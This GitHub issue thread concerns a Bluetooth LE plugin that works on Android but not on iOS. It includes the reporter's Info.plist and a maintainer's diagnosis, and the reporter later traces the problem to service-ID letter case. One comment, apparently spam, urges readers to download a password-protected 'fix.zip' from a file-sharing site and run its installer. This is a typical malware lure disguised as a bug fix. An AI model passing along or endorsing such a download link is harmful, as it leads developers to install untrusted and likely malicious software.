don/cordova-plugin-ble-central #1028: Feature works on Android but not on IOS

Sammy051, 2024-08-26:
We are experiencing an issue with the library where it functions correctly on Android but not on iOS. Can someone assist us in resolving this bug?

Ionic:
   Ionic CLI : 7.2.0
   Ionic Framework : @ionic/react 8.2.5
Capacitor:
   Capacitor CLI      : 6.1.1
   @capacitor/android : 6.1.1
   @capacitor/core    : 6.1.1
   @capacitor/ios     : 6.1.1
Utility:
   cordova-res : not installed globally
   native-run  : 2.0.1

### Info.plist
```<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>CFBundleDevelopmentRegion</key>
	<string>en</string>
	<key>CFBundleDisplayName</key>
	<string>GoMoof</string>
	<key>CFBundleExecutable</key>
	<string>$(EXECUTABLE_NAME)</string>
	<key>CFBundleIdentifier</key>
	<string>$(PRODUCT_BUNDLE_IDENTIFIER)</string>
	<key>CFBundleInfoDictionaryVersion</key>
	<string>6.0</string>
	<key>CFBundleName</key>
	<string>$(PRODUCT_NAME)</string>
	<key>CFBundlePackageType</key>
	<string>APPL</string>
	<key>CFBundleShortVersionString</key>
	<string>$(MARKETING_VERSION)</string>
	<key>CFBundleVersion</key>
	<string>$(CURRENT_PROJECT_VERSION)</string>
	<key>LSRequiresIPhoneOS</key>
	<true/>
	<key>UILaunchStoryboardName</key>
	<string>LaunchScreen</string>
	<key>UIMainStoryboardFile</key>
	<string>Main</string>
	<key>UIRequiredDeviceCapabilities</key>
	<array>
		<string>armv7</string>
	</array>
	<key>UISupportedInterfaceOrientations</key>
	<array>
		<string>UIInterfaceOrientationPortrait</string>
		<string>UIInterfaceOrientationLandscapeLeft</string>
		<string>UIInterfaceOrientationLandscapeRight</string>
	</array>
	<key>UISupportedInterfaceOrientations~ipad</key>
	<array>
		<string>UIInterfaceOrientationPortrait</string>
		<string>UIInterfaceOrientationPortraitUpsideDown</string>
		<string>UIInterfaceOrientationLandscapeLeft</string>
		<string>UIInterfaceOrientationLandscapeRight</string>
	</array>
	<key>NSBluetoothAlwaysUsageDescription</key>
	<string>GoMoof needs this to connect to your bike</string>
	<key>UIViewControllerBasedStatusBarAppearance</key>
	<true/>
	<key>NSBluetoothPeripheralUsageDescription</key>
	<string>GoMoof needs this to connect to your bike</string>
	<key>UIBackgroundModes</key>
	<array>
		<string>bluetooth-central</string>
	</array>
</dict>
</plist>
```
### Log of the IOS Session
[IOS Log](https://github.com/user-attachments/files/16749584/message.7.txt)

haohaohaoadsad, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

peitschie, 2024-08-28:
I'm not clear @Sammy051 what the exact problem is?

From the logs, the peripheral seems to be initiating the disconnect itself (i.e., it's not the plugin doing this). Have you tried another BLE application on iOS to see if this exhibits the same problem (e.g., [nrf Connect](https://apps.apple.com/us/app/nrf-connect-for-mobile/id1054362403))

Sammy051, 2024-08-31:
Hi @peitschie,
Im very sorry for the late response. We searched through our code and found the error. It seems that the service id is in lower case on Android and in upper Case on IOS. Thank you for your help : )

closed 2024-08-31 by Sammy051

peitschie, 2024-09-02:
Thanks for taking the time back to report your success @Sammy051